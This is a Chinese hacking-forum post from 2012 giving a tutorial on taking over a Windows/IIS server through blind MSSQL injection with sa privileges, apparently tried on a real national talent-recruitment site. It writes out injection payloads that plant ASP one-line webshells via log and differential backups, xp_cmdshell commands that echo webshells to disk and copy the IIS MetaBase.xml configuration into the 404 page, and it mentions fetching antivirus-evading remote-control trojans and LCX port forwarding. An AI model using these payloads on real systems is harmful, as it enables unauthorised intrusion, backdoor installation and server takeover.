找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————. h. @- x- s- C2 O7 I4 V

3 s) U" ]( t/ \8 X* h% L' ]3 c: Y+ ?/ @3 m/ e5 w
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。# ]# v7 e6 F- j/ c5 N. w4 S# {" X3 @
, I% N/ W8 d2 x
                                                                 & F* S3 B6 k& s* g) O
                                                                 & Q9 P" E1 c/ a1 z& o2 ^) Z( E
                                                                  论坛: http://www.90team.net/# b! j" }# x5 U  K1 F6 c
# ?' V( n" ]- P( j
9 Y+ C, k, t5 y" b! {4 c

7 t: [4 H; l! b+ S7 q友情检测国家人才网
/ c' ~$ B% B5 V  r$ C" I8 {
, [2 m+ `2 T* Q8 }' j- l) o$ L; t
5 u( `% A( z) m内容:MSSQL注入SA权限不显错模式下的入侵
3 E) o, n6 t, o- ~; ]4 Z
  g. }1 d7 O& P" l8 C
* O+ T7 \6 L7 r0 h8 K( o/ Y一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
# P- i( d4 X5 |5 o) o& j9 R! @0 ?+ g- s6 w
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。: @' Y( M- r9 |, Z9 _/ K$ E- U

- ~- t. e% e2 u! b
' i6 Z: w6 _7 }8 z5 E: ^' N. v这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。# L# X! g9 G  H' A6 L
1 q( o( [- D  u" X
思路:
& j" }/ r+ @. _$ @) I4 Q; S4 a* f0 Z+ v2 i, w$ x' r: _9 S1 Z& r& o
首先:
7 [% K; ^8 i, B; w* t0 T8 n  u3 \. ?7 q3 A) ^7 R/ l
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。6 L! K2 Z: J, B9 J7 ?. F5 ]
0 J! p3 E$ R6 P. F* l, S& }
1.日志备份获得Webshell0 A7 J. q. ~6 C8 X7 C% \

+ [4 o& z6 ?- @* T' z2.数据库差异备份获得Webshell
) w" g8 r8 H# w+ q! P6 t0 A' h
3 [5 ~! x/ `& q5 ?* G) o$ V* y4.直接下载免杀远控木马。
* f: o) S( M/ F1 d7 }! v7 P
; k7 s0 X; `) i( T/ C. @5.直接下载LCX将服务器端口转发出来
* E0 E3 N5 n  [$ P/ u! R* I7 M/ \1 i, ]( O6 b
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
3 K3 O# L0 B8 |8 a+ {5 ]: g1 Z4 @" H" S4 |$ J8 c+ ?  Q

6 @- Z. m8 q$ [& q, ]1 n1 ^  h5 I. B" K7 w
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, ! _: u& H' ~2 d+ j$ Z
6 w. ~( T7 _( B' S! e& i7 R
我直接演示后面一个方法
/ m4 U1 [! S2 O9 J  h* g5 [* d- g$ t
) C& H$ E) n  B* {; _2 Z8 ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
5 n: ?# q* H3 O* J2 M5 {+ _
) m8 y% [* O7 M& i; H" O) \
" V  @* V; u+ ?
, M' C4 V8 L+ {4 z. n6 u. g* R1 x8 m' J' m
◆日志备份:
+ M' e: O4 Q' m4 n* Z+ t* @2 r/ q7 t( n1 ]; t* K
" T# {* y5 c, G* Y: x; y
1. 进行初始备份5 C" o8 g, w  `2 l+ Q' p  B# ^
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--' Q9 G. C8 |# ~; z$ }0 |

+ B" g2 G$ B+ m) b6 v( A2. 插入数据, L  }; h  @, s% ]4 {
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
2 c7 K3 F* e' l6 w/ R7 ]
& g7 D" x. y9 C0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>+ p% p9 Z4 v. p( g+ j% L
  : C- Y) n6 ?! A- |! O5 r7 Q' {
3. 备份并获得文件,删除临时表
, f! x/ Q+ L- ~- c;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
' M2 B7 i$ h  |8 e3 l" }0 L$ F4 A0 P9 F: X8 b& I% W
9 B6 i6 _( p/ [; u( }

  w" }0 q4 s$ H8 u4 a4 ]4 E. w' d◆数据库差异备份
& C0 g7 u! W) O- q
. [! k6 E- w; c1 H5 f(1. 进行差异备份准备工作
. s8 P" t( A) q6 s0 g* C
7 t* p1 ^2 N4 }6 ]# s$ a* ]  x5 W0 |8 Z;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 I1 P! F3 V* G- z% d* v
/ e' x0 c7 h5 G/ v上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码+ t: ]& U0 }3 T
/ \/ E; s! H& N) I; ?6 o
6 o9 Z' H0 X; @  |- V. U
(2. 将数据写入到数据库
! g( q  o& @" @2 G2 E4 {7 Z;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- : Z% ~5 \) \2 f2 _$ V( C
' ^6 l" D& w  E' }# j
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>1 a8 W2 r5 o! A/ z3 {. Q

, Y1 S! C  A& y3. 备份数据库并清理临时文件
3 Y5 W. R+ y3 K+ u1 \/ b- u9 T7 v9 n; ?( g/ e: @8 A) B5 |( }
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
( D# n; [/ x1 k) q% D6 f0 ?
( G2 [* Y9 n; N- v3 s. H+ y8 N$ j0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 * k# S7 [2 x/ u6 \/ o
/ M. x6 r+ J( @5 G( Z1 [
. R6 e8 K7 M3 W7 _: H% k7 V
6 {% S% o, b5 U& P- \, |8 W& Y
用^转义字符来写ASP(一句话木马)文件的方法:   " M/ j: F. Q, Q- W. n3 w* _+ ?
5 x7 x7 j! p( V) K! N3 M% K
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--* s* r' Z/ s8 o+ W2 J9 y/ i

! I" C4 F& ]2 n& t0 ?% T2 u2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp ' G( n/ [( v6 @' R$ k8 G' L6 V
' Z/ m- I" ?7 R& \; X& K7 F9 C
读取IIS配置信息获取web路径& d8 B" L. J, ?- _/ W

; S" Z: w" r& @$ ?3 ^     6 ]" Z" Y  O& Z
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
; [1 E" L, x3 f" a- B
" X0 i8 W8 R7 A6 O执行命令
  \0 k: V/ E9 M$ j: w6 h" q     ' `, L4 n* e3 a+ S- Z
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
7 _9 g0 I  w2 _8 X" u: \) ?
1 q& `2 X+ c% ]& a
7 ^8 g/ H0 F1 p$ N* w- V  j4 i
9 U/ n  B8 |$ v# N6 }, D1 O: O$ o3 r' [0 l: j

( `- S& k% L% s2 G" M; ~
2 Y4 ^/ r! f& \0 T7 e( c' P! q5 {8 y  s1 Q' d
/ q; e$ w& [: d  b
) U2 ?1 g8 H, _7 }

) j, G( k: D* Z" s4 F# K. C; X; }

- a" Y6 s4 H" N0 v$ W6 |& d* V' u
' n5 q2 I* o. s: L
/ O2 @+ `  L2 _. L2 s0 L
5 y2 W6 d% w3 r( n: z/ A2 t; K% a% q: _; D9 d
# O5 y8 X: G; R1 p1 _7 @

+ f! }# E2 }/ F8 a5 H1 m' g+ n9 ^7 u1 n" p. h
9 ^" `% T. ?6 |+ s) p; E
' T* U, B) b& Q
0 o) c6 F/ l7 ?/ |1 `

9 x1 c0 a) F3 ~' E4 @
1 M+ J: G7 r9 n( a4 w% P, D/ s" I% r: w+ ~- R, x5 N4 \
2 X' k1 _) Y# v* f4 V4 h3 G- W
" k5 f! S! e/ P% ]/ b3 g% n; s" I2 M

" D+ q+ T/ K  P- g
2 s8 G% G3 j* ]0 l
, B1 B8 ]0 P7 f4 B6 y. e6 L( m! j! m7 s
% x( p. v5 k6 |. a$ ?
; o4 T; K: A- E; T

0 T$ }5 G& b9 f; _6 J3 j0 G' Q5 n* y8 J7 o8 S4 o
6 G1 x9 l8 M. W) I% q1 k

% h" i% U/ ~% Q$ y: X& d
! e$ ]; m# V! g. b
* k2 {0 N; [' S; G# P5 c4 H9 A; q6 e
1 m2 g* j' i# F
2 O5 q/ @$ W' z- U; z* {
2 g. M& r4 c) u1 m9 \
! F. L1 f; t; Z' R; e! |
9 a4 \) W. p" q8 M0 n5 ~* d

' P6 K6 U8 M: w. A, G. v$ @& N) A1 }; s2 z

* ]/ {. ]" g# T: ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表